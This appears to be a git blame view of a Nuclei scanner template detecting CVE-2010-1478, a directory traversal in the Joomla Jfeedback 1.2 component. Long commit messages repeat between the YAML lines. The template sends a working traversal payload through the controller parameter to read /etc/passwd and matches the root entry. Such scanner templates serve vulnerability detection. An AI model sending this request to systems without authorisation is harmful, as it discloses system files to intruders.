nuclei-templates/http/cves/2010/CVE-2010-1478.yaml

40 lines
1.4 KiB
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2010-1478
info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo
2023-07-11 19:49:27 +00:00
severity: medium
Dashboard (#3706) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing Co-authored-by: sullo <sullo@cirt.net>
2022-02-15 06:09:56 +00:00
description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
2023-09-06 13:22:34 +00:00
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/12145
- https://nvd.nist.gov/vuln/detail/CVE-2010-1478
Dashboard (#3706) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing Co-authored-by: sullo <sullo@cirt.net>
2022-02-15 06:09:56 +00:00
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
Dashboard (#3706) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing Co-authored-by: sullo <sullo@cirt.net>
2022-02-15 06:09:56 +00:00
cve-id: CVE-2010-1478
2022-09-06 01:33:31 +00:00
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.00826
epss-percentile: 0.80009
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: ternaria
product: com_jfeedback
tags: cve,cve2010,joomla,lfi,edb
2021-09-27 11:02:48 +00:00
http:
2021-09-27 11:02:48 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
- type: status
status:
Dashboard (#3706) * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1340.yaml by mp * Enhancement: cves/2010/CVE-2010-1345.yaml by mp * Enhancement: cves/2010/CVE-2010-1315.yaml by mp * Enhancement: cves/2010/CVE-2010-1314.yaml by mp * Enhancement: cves/2010/CVE-2010-1313.yaml by mp * Enhancement: cves/2010/CVE-2010-1312.yaml by mp * Enhancement: cves/2010/CVE-2010-1308.yaml by mp * Enhancement: cves/2010/CVE-2010-1307.yaml by mp * Enhancement: cves/2010/CVE-2010-1306.yaml by mp * Enhancement: cves/2010/CVE-2010-1305.yaml by mp * Enhancement: cves/2010/CVE-2010-1304.yaml by mp * Enhancement: cves/2010/CVE-2010-1302.yaml by mp * Enhancement: cves/2010/CVE-2010-1219.yaml by mp * Enhancement: cves/2010/CVE-2010-1352.yaml by mp * Enhancement: cves/2010/CVE-2010-1354.yaml by mp * Enhancement: cves/2010/CVE-2010-1461.yaml by mp * Enhancement: cves/2010/CVE-2010-1469.yaml by mp * Enhancement: cves/2010/CVE-2010-1470.yaml by mp * Enhancement: cves/2010/CVE-2010-1471.yaml by mp * Enhancement: cves/2010/CVE-2010-1472.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1476.yaml by mp * Enhancement: cves/2010/CVE-2010-1478.yaml by mp * Enhancement: cves/2010/CVE-2010-1491.yaml by mp * Enhancement: cves/2010/CVE-2010-1494.yaml by mp * Enhancement: cves/2010/CVE-2010-1495.yaml by mp * Enhancement: cves/2010/CVE-2010-1531.yaml by mp * Enhancement: cves/2010/CVE-2010-1473.yaml by mp * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: cves/2016/CVE-2016-4975.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-oracle.yaml by cs * Enhancement: misconfiguration/proxy/metadata-openstack.yaml by cs * Enhancement: misconfiguration/proxy/metadata-digitalocean.yaml by cs * Enhancement: misconfiguration/proxy/metadata-alibaba.yaml by cs * Enhancement: misconfiguration/proxy/metadata-hetzner.yaml by cs * Enhancement: misconfiguration/proxy/metadata-aws.yaml by cs * Enhancement: misconfiguration/proxy/metadata-google.yaml by cs * Enhancement: misconfiguration/proxy/metadata-azure.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-localhost.yaml by cs * Enhancement: misconfiguration/proxy/open-proxy-internal.yaml by cs * Enhancement: cves/2021/CVE-2021-1497.yaml by cs * Spacing fixes and enhancement to CNVD-2019-01348.yaml * Spacing fixes, and enhancement to CNVD-2019-01348.yaml * Merge artifact * Spacing Co-authored-by: sullo <sullo@cirt.net>
2022-02-15 06:09:56 +00:00
- 200
# digest: 4a0a0047304502202739d2586bb4ec12f8cc19d00a87d87aab625679e738061ec456aeb91fe07705022100f5de91afa3741db5cbe9a6cb6a7bec6f2c5109757239ad603b70381ac8a34e08:922c64590222798bb761d5b6d8e72950